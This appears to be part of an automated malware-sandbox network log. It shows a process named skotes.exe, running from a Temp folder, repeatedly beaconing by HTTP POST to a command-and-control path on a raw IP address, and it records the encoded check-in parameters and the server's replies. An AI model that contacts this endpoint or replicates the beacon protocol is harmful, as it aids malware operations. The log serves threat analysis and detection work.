                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:54 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      122192.168.2.652491185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:55.994329929 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:56.698301077 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:56 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      123192.168.2.652492185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:58.329977036 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:59.071259022 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:58 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      124192.168.2.652493185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:00.604305029 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:01.327974081 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:01 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      125192.168.2.652494185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:02.955499887 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:03.656709909 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:03 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      126192.168.2.652495185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:05.171227932 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:05.878586054 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:05 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      127192.168.2.652497185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:07.508668900 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:08.198093891 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:08 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      128192.168.2.652498185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:09.716810942 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:10.420685053 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:10 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      129192.168.2.652499185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:12.047831059 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:12.767874002 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:12 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      130192.168.2.652501185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:14.280533075 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:14.986053944 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:14 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      131192.168.2.652502185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:16.612575054 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:17.313122034 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:17 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      132192.168.2.652503185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:18.845350981 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:19.542546034 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:19 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      133192.168.2.652504185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:21.178689003 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:21.896496058 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:21 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      134192.168.2.652505185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:23.414428949 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:24.153076887 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:24 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      135192.168.2.652506185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:25.785267115 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:26.474679947 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:26 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      136192.168.2.652507185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:27.997462988 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:28.702722073 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:28 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


